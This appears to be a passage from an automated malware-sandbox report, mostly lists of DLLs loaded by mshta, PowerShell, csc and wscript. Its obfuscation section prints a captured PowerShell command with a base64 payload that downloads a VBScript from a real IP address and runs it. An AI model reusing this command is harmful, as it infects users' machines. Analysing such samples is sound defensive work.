Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1647938551.0000000007440000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.pdb source: powershell.exe, 00000003.00000002.1352224226.0000000004F32000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1647938551.0000000007440000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000D.00000002.1648730037.0000000007A1A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; 